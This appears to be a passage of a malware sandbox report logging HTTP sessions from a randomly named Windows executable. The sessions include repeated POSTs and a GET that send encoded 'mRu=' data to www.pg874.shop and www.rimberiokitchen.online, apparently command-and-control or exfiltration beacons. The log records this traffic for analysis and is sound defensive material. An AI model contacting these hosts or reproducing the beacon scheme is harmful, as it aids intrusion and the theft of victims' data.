Nov 12, 2024 15:30:30.042308092 CET	820	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:30:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 654 Connection: close X-Cache: MISS Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 71 75 64 61 6f 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 70 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <script src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/jquery.js"></script> <script charset="UTF-8" id="LA_COLLECT" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/qudao1.js"></script> ...script type="text/javascript" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/pd.js"></script--> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title>website</title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49728	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:35.481281042 CET	741	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 69 34 6f 57 61 2b 77 35 6c 43 61 2b 63 36 31 70 74 56 55 70 50 77 76 6b 49 65 39 6c 61 41 6e 6e 56 73 4e 6e 44 6e 6e 4c 74 7a 6a 66 6b 6f 78 78 55 46 52 54 42 32 36 47 67 4a 76 51 72 52 2b 66 70 2b 39 31 33 4c 39 39 6d 35 2f 4a 2f 55 70 6f 43 67 30 73 6a 58 4f 54 58 41 63 61 48 35 59 31 73 56 75 61 74 47 74 70 34 6a 58 39 78 5a 66 56 4d 63 35 66 43 68 50 34 62 32 75 66 30 34 58 74 49 44 30 54 69 53 61 6c 45 31 76 4d 4b 53 42 63 37 30 56 35 63 57 4b 41 79 41 41 51 4c 36 38 7a 4b 4f 6e 41 45 34 2b 59 74 68 6b 78 66 70 74 78 4b 30 5a 2f 77 3d 3d Data Ascii: mRu=389inJRufg4iYi4oWa+w5lCa+c61ptVUpPwvkIe9laAnnVsNnDnnLtzjfkoxxUFRTB26GgJvQrR+fp+913L99m5/J/UpoCg0sjXOTXAcaH5Y1sVuatGtp4jX9xZfVMc5fChP4b2uf04XtID0TiSalE1vMKSBc70V5cWKAyAAQL68zKOnAE4+YthkxfptxK0Z/w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49729	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:38.254262924 CET	761	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 6b 6e 6d 31 38 4e 6d 42 50 6e 49 74 7a 6a 51 30 6f 30 73 6b 45 64 54 42 71 59 47 6c 78 76 51 6f 74 2b 66 6f 4f 39 30 41 6e 69 38 32 35 39 63 76 55 76 32 79 67 30 73 6a 58 4f 54 55 38 6d 61 44 56 59 31 2f 39 75 5a 4d 47 75 67 59 6a 59 36 78 5a 66 45 63 63 39 66 43 68 68 34 65 75 41 66 32 41 58 74 4e 48 30 54 7a 53 5a 76 45 31 31 49 4b 54 6f 64 4b 5a 66 67 34 71 45 4e 52 6f 54 57 2b 71 6f 32 63 44 39 64 32 4d 61 62 2b 39 57 31 76 51 46 7a 49 31 43 69 7a 54 36 36 49 49 78 49 49 67 53 2f 66 63 65 73 57 6d 66 69 79 34 3d Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmoknm18NmBPnItzjQ0o0skEdTBqYGlxvQot+foO90Ani8259cvUv2yg0sjXOTU8maDVY1/9uZMGugYjY6xZfEcc9fChh4euAf2AXtNH0TzSZvE11IKTodKZfg4qENRoTW+qo2cD9d2Mab+9W1vQFzI1CizT66IIxIIgS/fcesWmfiy4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49730	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:41.021265030 CET	2578	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 73 6e 6d 48 45 4e 6e 67 50 6e 4a 74 7a 6a 54 30 6f 31 73 6b 45 55 54 42 69 63 47 6c 31 5a 51 74 68 2b 5a 2b 61 39 7a 31 54 69 79 32 35 39 65 76 55 71 6f 43 68 32 73 6e 4c 30 54 55 73 6d 61 44 56 59 31 36 35 75 4f 4e 47 75 69 59 6a 58 39 78 5a 74 56 4d 63 46 66 47 31 58 34 66 2b 2b 65 46 49 58 74 74 33 30 51 42 4b 5a 6a 45 31 72 4e 4b 54 77 64 4b 56 63 67 34 66 39 4e 51 63 35 57 35 32 6f 30 61 69 44 47 48 70 4d 5a 74 5a 6a 77 2f 45 49 7a 4c 74 74 39 44 37 65 2b 35 34 2b 4d 73 4a 43 34 4e 59 4c 7a 58 6a 41 34 56 55 50 66 55 33 6b 6d 4a 39 7a 66 2b 4a 30 36 66 39 64 32 56 66 39 47 4c 79 7a 57 36 51 66 46 46 77 64 43 63 46 72 79 53 65 4b 6f 63 69 74 45 59 69 46 55 49 72 62 73 47 43 39 68 56 52 59 56 55 36 4f 39 54 6b 64 65 6d 73 49 73 4f 6c 4b 2b 4a 6e 50 6c 62 46 31 74 71 41 2b 4f 71 4b 38 5a 38 52 69 38 4b 71 6a 53 53 2f 66 50 33 35 32 7a 36 6f 68 54 42 31 47 68 4c [TRUNCATED] Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmosnmHENngPnJtzjT0o1skEUTBicGl1ZQth+Z+a9z1Tiy259evUqoCh2snL0TUsmaDVY165uONGuiYjX9xZtVMcFfG1X4f++eFIXtt30QBKZjE1rNKTwdKVcg4f9NQc5W52o0aiDGHpMZtZjw/EIzLtt9D7e+54+MsJC4NYLzXjA4VUPfU3kmJ9zf+J06f9d2Vf9GLyzW6QfFFwdCcFrySeKocitEYiFUIrbsGC9hVRYVU6O9TkdemsIsOlK+JnPlbF1tqA+OqK8Z8Ri8KqjSS/fP352z6ohTB1GhLNariG0KPE6Rm4rPH1s7060XfoXFFYStQLSIeAf8e0iq+kGo90U9ZSAOV9npDQDf/LwJGGujPNu53z4gkOWTURWGo5FBG0j6ug//AyvPoxPa40pSCTxh/Rlot7pshi9TJ7Vj44I7RhlGvbYnXvHWYPbULiSEPw5VbAkuiXdI/lw6rTsIGekKfPKZAHi9yRLjhSHTimVZV6Apki2R21hjoVdUveNAXRVFPtPVp57ilUasOOW0eP/eKdzvB6w+dh664T7jg/abJpTTg5Uzxr08vfVwXPREBzfWATAhtcYWUaWOBlshjMyikdQ2XWJQnR06aFGycjBu32lRuqAaaKKvUZRsmnva3jarqkvA1yFzTJdP9aV9RclWnKrCZuDTqFZOnUBzQS+PnwSk4wpQdLMyCgaQJDyPKbUs/mny78AhF4GxdRwbRFuZR0w7v0b/8jwcOGoNEWhD/hzJEQN8tKZ55zPvcYGnUCAemCzj6suFg7CUkpMZY6BKmP/PVeZomzIjfepJAX9xFQ2VqTYi/PZYaDGQQaM+uo9bdeAz01NOv1X4JwJUqoPP6XWzF1G/AUNEOfvrh+i9ouQ/kOm7AnJ8e+orOZO4oR/cY1aDSQEWlYWaTP7vNsV2VUOS5XGMC3zaYQlQdg0VDiTtbJ6U98dQaFd9XiYDY18j+d3 [TRUNCATED]
Nov 12, 2024 15:30:41.021328926 CET	5332	OUT	Data Raw: 4c 4d 2f 36 6e 4c 63 76 2f 32 55 4b 2f 43 7a 46 51 4e 43 6c 64 2b 68 49 6c 77 62 53 47 54 4c 4a 71 76 41 64 42 30 6f 46 6d 2f 37 34 4f 73 36 42 64 4c 51 73 76 5a 6b 68 44 31 74 58 2b 65 41 31 64 53 52 5a 53 36 65 4d 72 5a 55 34 2f 30 6e 68 66 79 Data Ascii: LM/6nLcv/2UK/CzFQNCld+hIlwbSGTLJqvAdB0oFm/74Os6BdLQsvZkhD1tX+eA1dSRZS6eMrZU4/0nhfyOfjtxIepzDcpSsXuj6VAyan23f9ieKNcYONgL8oCy5RIQRroWQB7x7A78cHpUT66FtxZ4UMi6LZ/INMFrj9M1f8mKBTkyalR603nbDgDJk9cMVf+VfVzGee3+v9BzqhfE7ywPBvsd+joEkn4P2/Xth9sd4QaOZTUy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49731	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:43.801985025 CET	473	OUT	GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:30:44.047947884 CET	1289	IN	HTTP/1.1 200 OK Server: hcdn Date: Tue, 12 Nov 2024 14:30:43 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 1f3a210fb09ae77cb59ba56a858625ab-asc-edge4 Expires: Tue, 12 Nov 2024 14:30:42 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
Nov 12, 2024 15:30:44.047967911 CET	1289	IN	Data Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
Nov 12, 2024 15:30:44.047979116 CET	1289	IN	Data Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
Nov 12, 2024 15:30:44.047987938 CET	1289	IN	Data Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
Nov 12, 2024 15:30:44.048012018 CET	1289	IN	Data Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
Nov 12, 2024 15:30:44.048016071 CET	1289	IN	Data Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
Nov 12, 2024 15:30:44.048028946 CET	1289	IN	Data Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023\|55296)),r=56320\|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
Nov 12, 2024 15:30:44.048063993 CET	1289	IN	Data Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75 Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49732	208.91.197.27	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:49.398493052 CET	777	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4e 57 61 35 4e 37 51 69 59 73 4b 58 46 6b 79 67 75 77 65 44 64 6f 45 47 73 63 75 4a 59 64 5a 4f 5a 44 7a 65 67 41 46 52 46 6c 73 5a 43 6e 50 6e 65 44 37 54 75 37 4d 68 52 35 70 30 57 6b 47 6b 53 63 35 76 4f 59 68 5a 39 70 69 4f 61 54 4a 5a 49 4c 2f 79 49 67 69 4d 30 46 67 63 53 63 34 66 35 6a 48 54 2f 6c 76 41 6f 45 39 78 67 68 77 31 7a 53 6f 2f 49 34 55 54 4a 31 64 77 42 6e 33 72 4f 78 52 37 70 49 64 4b 4d 64 47 43 55 58 69 4e 45 5a 4f 6f 34 2f 72 4b 32 30 36 50 74 74 42 7a 73 63 78 38 74 6d 32 74 56 4f 38 69 37 69 32 37 49 67 65 45 41 67 3d 3d Data Ascii: mRu=bnpv5ujJ23BANWa5N7QiYsKXFkyguweDdoEGscuJYdZOZDzegAFRFlsZCnPneD7Tu7MhR5p0WkGkSc5vOYhZ9piOaTJZIL/yIgiM0FgcSc4f5jHT/lvAoE9xghw1zSo/I4UTJ1dwBn3rOxR7pIdKMdGCUXiNEZOo4/rK206PttBzscx8tm2tVO8i7i27IgeEAg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49733	208.91.197.27	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:52.073029995 CET	797	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 39 4f 59 68 62 65 68 45 78 52 43 6c 73 5a 4b 48 50 2b 42 7a 37 59 75 37 51 54 52 39 70 30 57 6c 69 6b 53 64 4a 76 4f 72 4a 59 39 35 69 41 44 44 4a 62 4d 4c 2f 79 49 67 69 4d 30 47 63 32 53 63 67 66 2b 54 58 54 2f 42 62 42 69 6b 39 79 6f 42 77 31 6b 43 6f 37 49 34 55 68 4a 30 77 58 42 6b 50 72 4f 77 68 37 70 63 4a 46 58 74 47 45 51 58 69 5a 4e 39 44 50 6a 63 57 2f 77 7a 61 79 6e 4d 46 52 67 71 38 6d 77 55 43 4a 57 64 67 51 2f 53 50 54 4b 69 66 66 64 6f 72 34 7a 64 58 4e 4f 63 55 4b 42 6d 51 41 72 56 6b 46 4c 62 63 3d Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO9OYhbehExRClsZKHP+Bz7Yu7QTR9p0WlikSdJvOrJY95iADDJbML/yIgiM0Gc2Scgf+TXT/BbBik9yoBw1kCo7I4UhJ0wXBkPrOwh7pcJFXtGEQXiZN9DPjcW/wzaynMFRgq8mwUCJWdgQ/SPTKiffdor4zdXNOcUKBmQArVkFLbc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49734	208.91.197.27	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:54.744513988 CET	7946	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 31 4f 59 53 6a 65 67 6a 74 52 44 6c 73 5a 56 33 50 6a 42 7a 37 46 75 37 59 58 52 39 74 43 57 6d 4b 6b 51 2f 42 76 48 2b 39 59 33 35 69 41 4c 6a 4a 61 49 4c 2b 36 49 6a 4b 32 30 47 4d 32 53 63 67 66 2b 56 54 54 35 56 76 42 78 30 39 78 67 68 77 35 7a 53 6f 54 49 34 4d 78 4a 30 31 67 43 56 76 72 4e 51 78 37 71 70 64 46 4b 64 47 47 63 33 6a 65 4e 36 4c 51 6a 63 4c 47 77 7a 48 58 6e 50 56 52 78 73 39 35 74 6d 57 78 44 64 63 54 6a 44 6e 34 42 42 54 52 59 76 7a 61 79 37 54 4b 4a 72 34 4b 42 47 6f 74 7a 6c 4d 57 63 64 54 63 36 75 46 2f 31 64 67 32 74 37 52 32 39 59 78 6f 6e 66 70 67 6c 70 2f 32 49 62 48 53 6f 48 53 78 32 41 2b 41 4a 4f 35 6d 34 35 55 4f 4c 2f 6d 70 71 30 50 66 55 4a 4d 42 5a 56 65 2f 41 65 6b 42 32 69 66 6b 79 70 43 32 6f 66 58 42 6f 48 62 53 7a 4b 56 70 37 36 42 37 5a 36 50 36 50 30 71 66 66 65 49 4c 39 6b 4d 63 32 6d 49 55 6c 4f 6b 42 43 48 59 64 76 38 [TRUNCATED] Data Ascii: 